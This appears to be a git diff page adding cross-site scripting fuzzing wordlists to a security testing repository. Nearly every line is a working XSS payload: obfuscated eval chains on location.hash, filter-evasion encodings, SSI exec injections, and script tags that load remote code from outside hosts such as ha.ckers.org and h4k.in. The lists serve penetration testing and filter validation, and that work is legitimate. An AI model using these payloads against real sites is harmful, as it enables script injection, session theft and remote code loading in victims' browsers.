d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))
|
||||
l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a
|
||||
_=eval,__=unescape,___=document.URL,_(__(___))
|
||||
$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
|
||||
$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
|
||||
evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)
|
||||
with(location)with(hash)eval(substring(1))
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<style>body:after{content: “\61\6c\65\72\74\28\31\29″}</style><script>
|
||||
eval(eval(document.styleSheets[0].cssRules[0].style.content))
|
||||
</script>
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
|
||||
>"'
|
||||
a=alert;a(0)
|
||||
A=alert;A(1)
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
||||
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
||||
</textarea><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
|
||||
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
|
||||
http://aa"><script>alert(123)</script>
|
||||
http://aa'><script>alert(123)</script>
|
||||
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
|
||||
52
Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.txt
Normal file
52
Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.txt
Normal file
@ -0,0 +1,52 @@
|
||||
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
|
||||
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
|
||||
'';!--"<script>alert(0);</script>=&{(alert(1))}
|
||||
"><script>alert(0);</script>
|
||||
'><script>alert(0);</script>
|
||||
'<script>alert(0);</script>
|
||||
<img src=x onerror=;;alert(1) />
|
||||
</title><script>alert(1)</script>
|
||||
`> <script>alert(5)</script>
|
||||
</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
|
||||
</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
|
||||
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
|
||||
;}alert(0);{
|
||||
"+alert(0)+"
|
||||
xyz onerror=alert(6);
|
||||
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
|
||||
a=eval;b=alert;a(b(8));
|
||||
a=1;a=eval;b=alert;a(b(11));//
|
||||
';//%0da=eval;b=alert;a(b(9));//
|
||||
";//%0da=eval;b=alert;a(b(10));//
|
||||
'};a=eval;b=alert;a(b(13));//
|
||||
"};a=eval;b=alert;a(b(12));//
|
||||
1};a=eval;b=alert;a(b(14));//
|
||||
'];a=eval;b=alert;a(b(15));//
|
||||
"];a=eval;b=alert;a(b(16));//
|
||||
1];a=eval;b=alert;a(b(17));//
|
||||
1;a=eval;b=alert;a(b(/c/.source));
|
||||
%0da=eval;b=alert;a(b(/d/.source));
|
||||
*/a=eval;b=alert;a(b(/e/.source));/*
|
||||
<script src=//h4k.in
|
||||
<script src=http://h4k.in/>
|
||||
<script src=//h4k.in></script>
|
||||
"><script src=//h4k.in></script><
|
||||
<scri
|
||||
pt src=//h4k.in><
|
||||
></script>
|
||||
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
|
||||
"><script src=http://h4k.in/i.js></script>
|
||||
"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script>
|
||||
"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script>
|
||||
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))
|
||||
" style="color: expression(alert(0));" a="
|
||||
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
|
||||
<img src=`x` onrerror= ` ;; alert(1) ` />
|
||||
" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
|
||||
" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
|
||||
%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/
|
||||
c%00""<script>alert(0);</script>
|
||||
BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}
|
||||
x=alert;x(%26%2340 /finally through!/.source %26%2341);
|
||||
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
|
||||
http://aa<script>alert(123)</script>
|
||||
109
Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.txt
Normal file
109
Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.txt
Normal file
@ -0,0 +1,109 @@
|
||||
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT>alert('XSS')</SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS');">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS');">
|
||||
<IMG LOWSRC="javascript:alert('XSS');">
|
||||
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
||||
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<IMG SRC="livescript:[code]">
|
||||
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IMG SRC="mocha:[code]">
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d);
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
||||
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
||||
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
||||
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
|
||||
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
|
||||
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
|
||||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
\";alert('XSS');//
|
||||
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
|
||||
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
||||
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<A HREF="http://66.102.7.147/">XSS</A>
|
||||
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
|
||||
<A HREF="http://1113982867/">XSS</A>
|
||||
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
|
||||
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
|
||||
<A HREF="htt p://6	6.000146.0x7.147/">XSS</A>
|
||||
<A HREF="//www.google.com/">XSS</A>
|
||||
<A HREF="//google">XSS</A>
|
||||
<A HREF="http://ha.ckers.org@google">XSS</A>
|
||||
<A HREF="http://google:ha.ckers.org">XSS</A>
|
||||
<A HREF="http://google.com/">XSS</A>
|
||||
<A HREF="http://www.google.com./">XSS</A>
|
||||
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
||||
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
|
||||
2690
Fuzzing/XSS/robot-friendly/XSS-payloadbox.txt
Normal file
2690
Fuzzing/XSS/robot-friendly/XSS-payloadbox.txt
Normal file
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue
Block a user